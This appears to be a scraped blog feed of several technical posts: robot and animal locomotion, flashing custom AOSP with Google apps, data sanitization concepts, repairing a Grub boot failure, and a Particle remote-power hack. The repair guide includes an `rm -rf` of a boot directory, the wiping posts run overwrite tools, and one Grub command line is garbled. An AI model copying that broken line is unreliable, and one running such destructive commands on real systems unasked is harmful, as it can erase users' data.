<p>But first, a bit of physics review. What does it mean for an organism which is standing on limbs to be stable or unstable? First, consider the limbs which are in contact with the ground. Now connect these limbs with imaginary lines to form an imaginary polygon on the ground beneath the organism. In order for an organism to be stable, its center of gravity must be somewhere within this polygon. If the center of gravity leaves this area, the organism will start to tip over and without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?</p>
<h2>Six Limbed Organisms</h2>
<p>First, consider the six limbed bug. When the bug is stationary, it is standing on all six limbs and stable. How about when it wants to move? To move, the bug can pick up, for example, its front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs still on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position. This means the bug is now free to move its lifted limbs forward and place them down. Placing them down creates another tripod which, in turn, stabilizes the bug so it can lift up and move the limbs which were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand which could freeze the bug, I could freeze the bug at any point during its locomotion and it would not fall over. So to summarize, with six limbs an organism can be stable while stationary or while in motion.</p>
<h2>Four Limbed Organisms</h2>
<p>How about the four limbed organism? When it's stationary, it has four limbs on the ground so again no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion would have to be very awkward. Specifically, the organism would have to shift its center of gravity to be within the triangle formed by three of its limbs, move the now freed limb forward, and then shift its center of gravity over to the newly formed triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves which is something the six limbed organism didn't have to concern itself with. So to summarize, the four limbed organism is stable while stationary and potentially stable while moving, but requires a more complicated locomotion.</p>
<h2>Two Limbed Organisms</h2>
<p>Which leaves us with the two limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only form a line, not a polygon. So if each limb contacts the ground as only a single point, the organism will constantly be in a state of falling no matter where it shifts its center of gravity. To compensate for this, two limbed organisms have feet. Since the feet contact the ground at multiple points and not just one, the line now becomes a very narrow rectangle and stability can be achieved while standing. However, this rectangle is very narrow compared to the polygons formed by the stationary four or six limbed organisms. Consequently, if someone were to push each organism, the two limbed organism is much easier to knock over than the others. To state it more scientifically, while the four and six limbed organisms are in stable equilibrium when stationary, the two limbed organism is in unstable equilibrium. When disturbed by an outside force, the four and six limbed organisms tend to remain standing while the two limbed organism tends to start falling over.</p>
<p>Similarly to the four limbed organism, while it is possible for the two limbed organism to move without sacrificing stability, doing so results in a very awkward locomotion. The two limbed organism has to shift its center of gravity to be balanced on one foot so it can lift and move the other foot, and then its center of gravity has to be carefully shifted towards the newly placed foot, making sure that the center of gravity doesn't shift outside the narrow rectangle representing its stability. You can imagine how awkward and difficult this would be.</p>
<h2>Complexity Versus Efficiency</h2>
<p>So if having fewer than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have fewer than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all its own work in order to move itself. On the other hand, if an organism is unstable, it can take advantage of gravity to do some of the work of moving for it.</p>
<p>Consider once again the two limbed organism. Specifically, consider a human since that's the two limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is called walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts their foot, shifts their center of gravity forward, and then catches themselves with their lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves as they fall forward again. After the first step, a portion of the forward energy is being generated by momentum as a result of gravity and this is a portion of energy which no longer needs to be generated by the organism. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.</p>
<p>The same notion applies to running for two and four limbed organisms. Once the organism is running, the energy needed to continue running is simply the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. While the organism is in the part of its stride where all of its limbs are off the ground, it is using no energy while still moving forward. To summarize, instability allows for greater efficiency.</p>
<h2>Conclusion</h2>
<p>The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade-off between complexity and efficiency. With more limbs, the system can be simpler because it's more stable. On the other hand, with fewer limbs the system can be more efficient, but it also becomes more complex as it now has to be aware of its momentum and center of gravity. This could be an explanation as to why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.</p>
<p>So what does all this have to do with the DARPA robotics challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four limbed robots outperformed the two limbed robots in this competition. For the engineers designing and building these robots, making a robot which is able to move on only two limbs adds a layer of complexity which the four limb robots don't have to worry about. However, as the field of robotics advances, two limbed robots will ultimately be superior to four limbed robots on land, especially as efficiency becomes the leading concern.</p>Installing Google Play Service and Google Apps on Nexus AOSP2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/play-service-on-aosp.html<p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0 …</p><p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0.2, but these steps should hopefully work for all Nexus devices and most Android versions. This tutorial is broken up into 4 parts:</p>
<h2>Part 1: Compiling a Custom Image</h2>
<p>First, make sure you've downloaded the vendor drivers for your device: <a href="https://developers.google.com/android/nexus/drivers">link</a></p>
<p>Once you've downloaded the appropriate files, unzip them. You should now have a bunch of script files. Place these script files in the root directory of your AOSP repository and run them.</p>
<p>Next, make sure you've loaded your sources and selected the correct lunch target for your device (for Nexus 5, this is hammerhead, aka 20):</p>
<div class="highlight"><pre><span></span><span class="nb">source</span> build/envsetup.sh
lunch <span class="m">20</span>
</pre></div>
<p>If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:</p>
<div class="highlight"><pre><span></span>make clobber
</pre></div>
<p>After that, make your ROM:</p>
<div class="highlight"><pre><span></span>make
</pre></div>
<h2>Part 2: Flashing Custom Image to a Nexus Device</h2>
<p>First, reboot your device into fastboot. The hardware button sequence for your device can be found here: <a href="https://source.android.com/source/building-devices.html">link</a></p>
<p>Once in fastboot, ensure that your bootloader is unlocked. You can lookup how to do this online.</p>
<p>After that, check that your computer can detect your device. You should see it when you run the following command:</p>
<div class="highlight"><pre><span></span>fastboot devices
</pre></div>
<p>If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.</p>
<p>Finally, flash the device:</p>
<div class="highlight"><pre><span></span>fastboot -w flashall
</pre></div>
<h2>Part 3: Flashing Recovery</h2>
<p>At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (GPS, Google Play, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices. So before we can do that, we need to install a 3rd-party recovery.</p>
<p>First, reboot the device into fastboot. This can be done via adb:</p>
<div class="highlight"><pre><span></span>adb reboot bootloader
</pre></div>
<p>Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend twrp which can be found here: <a href="https://twrp.me/Devices/">link</a></p>
<p>For Nexus 5, this version of twrp will work: <a href="https://dl.twrp.me/hammerhead/twrp-2.8.7.1-hammerhead.img.html">link</a></p>
<div class="highlight"><pre><span></span>fastboot flash recovery twrp-2.8.7.1-hammerhead.img
</pre></div>
<p>After that, reboot the device:</p>
<div class="highlight"><pre><span></span>fastboot reboot
</pre></div>
<h2>Part 4: Install Gapps</h2>
<p>First, push a gapps archive onto your sd card. This can be downloaded from cyanogen's website: <a href="https://web.archive.org/web/20161224215109/https://wiki.cyanogenmod.org/w/Google_Apps">link</a></p>
<p>The website only shows which gapps corresponds to which cyanogenmod version and not the equivalent AOSP version. From my experience, I believe the following mapping to be true:</p>
<ul>
<li>Android 5.1.0 &lt;=&gt; CM 12.1</li>
<li>Android 5.0.0, 5.0.1, 5.0.2 &lt;=&gt; CM 12</li>
</ul>
<p>If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note, you can always do a factory reset from recovery to remove gapps and then install another version.</p>
<p>Once you've downloaded a version of gapps, push it to the sd card:</p>
<div class="highlight"><pre><span></span>adb push gapps.zip /sdcard/
</pre></div>
<p>Once the zip is written to the sd card, reboot into recovery:</p>
<div class="highlight"><pre><span></span>adb reboot recovery
</pre></div>
<p>Once in the Recovery, select install from zip and select your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be prompted with the Welcome screen which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.</p>Digital Verses Analog Sanitization2015-10-28T22:30:00-04:002015-10-28T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-28:/water-buckets.html<p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping …</p><p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping for the other follow-up I promised regarding a more practical guide to data protection, this is not that post. This is going to be another conceptual writing.</p>
<h2>The Analogy</h2>
<p>The analogy which I'm going to use to try to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with so here it goes.</p>
<p>Imagine you have a collection of buckets which can each hold 4 cups of water. You are able to add and remove water from the buckets whenever you like, however, you must always try to add or remove 3 cups worth of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups worth of water in it. If you try to add water again to the same bucket, some water overflows and is lost so ultimately the bucket ends up with 4 cups worth of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.</p>
<p>Now here's the last piece regarding how this analogy works. Assume that we only care about answering the question of whether a particular bucket is more full or more empty. Therefore, if the bucket contains more than 2 cups of water, we will call it mostly full. Likewise, if it has less than 2 cups of water, we will consider it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it given how this model works. In fact, it is only possible for any particular bucket to contain 0, 1, 3, or 4 cups of water; assuming all the buckets start empty.</p>
<h2>Emptying the Buckets</h2>
<p>So we have our buckets and some time has gone by and now all of our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now let's assume that we want to "wipe" all of our buckets. In other words, we want all our buckets to be mostly empty. The process is pretty easy, we can just go to every bucket and remove water from it. Simple, right?</p>
<p>While it is true that doing this will now cause all of our buckets to be mostly empty, take another look at how much water is actually in each bucket. The buckets which originally had 3 or fewer cups of water will now be empty, but the buckets which originally had 4 cups of water will still have 1 cup of water remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from the current state of the buckets!</p>
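<p>This residual effect is easy to check with a few lines of shell arithmetic. The sketch below models only the buckets from the analogy (nothing about real storage devices); the function names <code>add</code> and <code>remove</code> are made up for the illustration:</p>

```shell
# Toy bucket model: capacity 4 cups, every add/remove moves 3 cups.
add()    { echo $(( $1 + 3 > 4 ? 4 : $1 + 3 )); }
remove() { echo $(( $1 - 3 < 0 ? 0 : $1 - 3 )); }

full=$(add "$(add 0)")   # 0 -> 3 -> 4 cups (mostly full)
partial=$(add 0)         # 0 -> 3 cups (also mostly full)

# One "wipe" pass leaves a telltale cup behind in the bucket that was full.
echo "was full:    $(remove "$full") cup(s) left"
echo "was partial: $(remove "$partial") cup(s) left"
```

<p>Running <code>remove</code> a second time drives both buckets to zero, which is exactly the extra pass that distinguishes analog sanitization from digital sanitization.</p>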
<h2>What Went Wrong?</h2>
<p>In a nutshell, the reason why we were able to figure out the past state of some of the buckets is that there is a correlation between the last state the bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only considered the 2 possible digital states for a particular bucket and ignored the 4 possible analog states. If we had considered the analog states, we would have realized that we needed to empty each bucket twice in order to make it impossible to determine any bucket's previous state. This is an analogy of the difference between digital and analog sanitization.</p>
<h2>Back to Reality</h2>
<p>Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. For those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, we have a tendency to abstract away the gritty details about how the underlying hardware of a computer works. While utilizing this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance with our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist, but become hidden underneath the veil of our abstractions.</p>
<p>So to end on a slightly more practical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle for "zeroing" out the data over 1 pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes is necessary depends on the particulars of the device, so if you need to wipe a computer, smart-phone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.</p>Is your data really gone? Explaining the challenges of data wiping.2015-10-24T22:30:00-04:002015-10-24T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-24:/data-sanitization.html<p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the …</p><p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.</p>
<p>How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?</p>
<p>In this article, I'm going to be covering a conceptual topic which forms one of the cornerstones of a field known as <em>digital forensics</em>. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?</p>
<h2>Terminology</h2>
<p>The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, there are different extents to which data can be deleted on an electronic device, and depending on the extent to which the data is deleted, recovering it will entail a varying level of difficulty.</p>
<p>Many publications already categorize the degrees of data sanitization. For example, <a href="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf">NIST 800-88</a> (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to the laymen, I'm going to use an alternative categorization used in many <a href="https://www.usenix.org/legacy/event/fast11/tech/full_papers/Wei.pdf">publications</a>. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the <em>Clear</em> and <em>Purge</em> categories of NIST 800-88. Namely, I'm going to cover <em>logical sanitization</em>, <em>cryptographical sanitization</em>, <em>digital sanitization</em>, and <em>analog sanitization</em>. </p>
<h2>Logical Sanitization</h2>
<p>Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:</p>
<p>Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.</p>
<p>Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.</p>
<p>You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.</p>
<p>Despite this fault, this is what actually happens in your electronic device when you normally delete your file. Your device doesn't actually delete the file itself, it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.</p>
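<p>A toy version of this mechanism fits in a few shell commands, with a flat file standing in for the disk and a second file standing in for the filesystem's pointer table. Both filenames, <code>storage.bin</code> and <code>index.txt</code>, are made up purely for the illustration:</p>

```shell
# Hypothetical "disk" and "file table" for demonstration purposes only.
printf 'TOP-SECRET' > storage.bin        # raw data sitting on the "disk"
echo 'note.txt -> block 0' > index.txt   # the pointer to that data

# A normal delete removes only the pointer...
sed -i '/note.txt/d' index.txt
echo "pointers remaining: $(wc -l < index.txt)"

# ...while the raw data survives until something overwrites it.
grep -a 'TOP-SECRET' storage.bin
```

<p>The final <code>grep</code> still finds the "deleted" data, which is exactly what file-recovery tools exploit.</p>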
<p>So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concerned about speed than security, so system developers design their systems to delete data in the fastest way possible.</p>
<h2>Cryptographical Sanitization</h2>
<p>Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.</p>
<p>To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.</p>
<p>Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.</p>
<p>However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.</p>
<p>Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.</p>
<h2>Digital Sanitization</h2>
<p>Now we reach the stronger techniques for sanitizing data. Both of the two remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.</p>
<p>Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.</p>
<p>Or can you?</p>
<p>As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!</p>
<h2>Analog Sanitization</h2>
<p>Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property and replacing it with new dirt and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left to be used to try to reconstruct a replica house from. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and every impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.</p>
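<p>In software, the usual approximation of analog sanitization is a multi-pass random overwrite. A sketch using GNU <code>shred</code> is below; it deliberately targets a throwaway file, since pointing it at a real device (e.g. <code>/dev/sdX</code>) is destructive and should only be done after double-checking the device name:</p>

```shell
# Create a 4 MiB scratch file standing in for a storage device.
dd if=/dev/zero of=scratch.img bs=1M count=4 status=none

# Three passes of random data, then a final pass of zeros (-z),
# with progress reporting (-v). More passes, weaker residual correlation.
shred -v -n 3 -z scratch.img

rm scratch.img
```

<p>Purpose-built tools like DBAN apply the same idea to whole disks, with wipe patterns tuned to the device.</p>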
<h2>Afterword</h2>
<p>This article ended up becoming more conceptual than I originally intended, but I hope the analogy was able to make the concepts I covered approachable. As mentioned, I hope to at some point write a follow-up article using another analogy which can better explain the difference between digital and analog sanitization. I also hope to in the future write an article to serve as the practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.</p>The importance of boot partitions in Linux systems.2015-10-20T22:30:00-04:002015-10-20T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-20:/boot-partition.html<p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups …</p><p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems; so there I was.</p>
<p>In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.</p>
<h2>Finding the Problem</h2>
<p>The server in question was a Dell Poweredge T620 running Ubuntu. The server consisted of two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.</p>
<p>The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error <code>error: attempt to read or write outside of disk hd0</code>. After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.</p>
<p>My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.</p>
<h2>Diagnosing the Problem</h2>
<p>Since the error message that was appearing was being generated by Grub, the next thing I did was try to manually start the Linux kernel. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.</p>
<h3>Understanding Partitions</h3>
<p>Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.</p>
<p>First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drives follow a naming convention which starts with "sd" followed by a letter designating the drive: "sda", "sdb", "sdc", and so on. Partition names consist of a hard drive name followed by a digit. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.</p>
<p>Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form of "hd#,#" where the first # represents the disk number and the second # represents the partition on that disk: "hd0,1", "hd0,2", and so on. Note that Grub numbers disks starting from 0, while in Grub 2 partitions are numbered starting from 1, so "hd0,1" is the first partition of the first disk.</p>
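<p>To make the two naming schemes concrete, here is a tiny shell helper (my own illustration, not part of Grub or Linux) that translates a Grub-style name into the /dev device name it typically corresponds to:</p>

```shell
# Hypothetical helper: translate a Grub 2 style "hd#,#" name into the
# Linux /dev device name it typically maps to. Grub numbers disks from
# 0 while Linux letters them from "a"; the partition number is the
# same in both schemes.
grub_to_dev() {
    name="${1#\(}"; name="${name%\)}"  # tolerate "(hd0,1)" as well as "hd0,1"
    disk="${name%,*}"                  # e.g. "hd0"
    part="${name#*,}"                  # e.g. "1"
    index="${disk#hd}"                 # strip the "hd" prefix -> "0"
    # 97 is the ASCII code for 'a'; disk 0 -> sda, disk 1 -> sdb, ...
    letter=$(printf "\\$(printf '%03o' $((97 + index)))")
    echo "/dev/sd${letter}${part}"
}

grub_to_dev "hd0,1"    # first disk, first partition
grub_to_dev "(hd1,3)"  # second disk, third partition
```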
<h3>Boot Sequence</h3>
<p>While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinuz.</p>
<p>BIOS stands for Basic Input Output System and is the first thing the system executes upon receiving power. Once the BIOS is started, it'll perform some basic system checks and then load and execute the bootloader. There are many bootloaders out there, but Linux systems tend to use a particular one called Grub. Grub's job is to load the pieces into memory that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to load into memory are initrd and vmlinuz. I won't discuss these files in great detail, but to explain them briefly: vmlinuz is the (compressed) Linux kernel image, and initrd is the initial RAM disk, a minimal temporary root filesystem containing the drivers and programs the kernel needs in order to mount the real root filesystem. Grub loads both into memory and starts the kernel; once the kernel has mounted the real root filesystem, the RAM disk is discarded.</p>
<h3>Diagnosing Grub</h3>
<p>Now that I've covered all the necessary background information, on to the Grub commands.</p>
<p>The first step is to find where the boot directory is on the system. First, list all the partitions on the system:</p>
<div class="highlight"><pre><span></span>grub&gt; ls
</pre></div>
<p>This will print a list of all the disks and partitions on the system. The next step is to figure out which partition contains the boot files, initrd and vmlinuz (since we're trying to boot a Linux operating system). This can also be done with the ls command:</p>
<div class="highlight"><pre><span></span>grub&gt; ls (hd0,1)
grub&gt; ls (hd0,1)/boot
</pre></div>
<p>Once we've found the location of the boot files, set that partition as Grub's root directory:</p>
<div class="highlight"><pre><span></span>grub&gt; set root=(hd0,1)
</pre></div>
<p>I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).</p>
<p>After we've found the correct root partition, we next need to give Grub the names of the vmlinuz and initrd files (on a real system these file names usually carry a version suffix, so use the Grub shell's tab completion to find the exact names):</p>
<div class="highlight"><pre><span></span>grub&gt; /boot/vmlinux root=/dev/sda1
grub&gt; initrd /boot/initrd
</pre></div>
<p>Note, the linux command needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system. This may or may not be the same partition holding the boot files.</p>
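<p>For example, if the boot files live in the root of a dedicated first partition while the operating system itself is on the second partition, the whole sequence might look like this (device and file names are illustrative, and in Grub 2 the kernel is loaded with the <code>linux</code> command):</p>

```
grub> set root=(hd0,1)
grub> linux /vmlinuz root=/dev/sda2
grub> initrd /initrd
grub> boot
```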
<p>Once all the files have been specified, all that's left is to boot the operating system:</p>
<div class="highlight"><pre><span></span>grub&gt; boot
</pre></div>
<p>At this point, you'll get a basic command shell for Linux. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command. This told me that initrd was the problematic file. So how do we fix this?</p>
<h2>Remediation</h2>
<p>So what went wrong? The problem lies with the partitions on the server's hard drives. When Grub tries to load the initrd file into memory, it reaches the end of what it can read from the hard drive before reaching the end of the file. In our case, the RAID controller makes the hard drives appear as a single 4TB drive. That is quite large, and the initrd file could reside anywhere in those 4TBs. As it turns out, Grub could not address the disk location of our initrd file and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was rewritten and ended up in a location on the logical drive which Grub can't reach.</p>
<p>The solution to this problem is to keep the boot files in a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, even though most Linux installers do not require you to do this.</p>
<p>In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.</p>
<h2>Creating a Boot Partition in an Existing Linux Installation</h2>
<p>I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.</p>
<p>The first thing I did was use gparted to create a new partition to serve as the dedicated boot partition. Since the hard drive is already formatted, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted as "ext4" and needs to have the "boot" flag enabled. Completing the shift will take a while, so you'll probably want to do this overnight.</p>
<p>Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:</p>
<div class="highlight"><pre><span></span>sudo -s
mkdir /mnt/sda2
mkdir /mnt/sda4
mount /dev/sda2 /mnt/sda2
mount /dev/sda4 /mnt/sda4
cp -R /mnt/sda2/boot/* /mnt/sda4/
rm -rf /mnt/sda2/boot/
mkdir /mnt/sda2/boot
umount /mnt/sda2
umount /mnt/sda4
</pre></div>
<p>Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use <a href="https://help.ubuntu.com/community/Boot-Repair">Boot Repair</a>. If you choose to go the Boot Repair route, make sure to switch the GUI into advanced mode and go through all the options. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition; you can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to edit "grub.cfg", changing every "hd" reference to point at the correct partitions, and add an entry to fstab that mounts your new partition at "/boot" on start-up.</p>
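<p>If you go the manual route, the extra fstab entry would look something like the following. Note the UUID below is a made-up placeholder; find the real one for your new partition with <code>blkid /dev/sda4</code> (substituting your own partition name):</p>

```
# /etc/fstab -- mount the dedicated boot partition at /boot on start-up.
# The UUID is an example only; substitute the value blkid reports.
UUID=3f1b2c4d-0000-0000-0000-000000000000  /boot  ext4  defaults  0  2
```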
<p>If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.</p>
<h2>Conclusion</h2>
<p>Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.</p>Using internet of things to turn on a computer.2015-09-18T11:16:00-04:002015-09-18T11:16:00-04:00Carter Yagemanntag:carteryagemann.com,2015-09-18:/desktop-remote-switch.html<p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The …</h2><p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
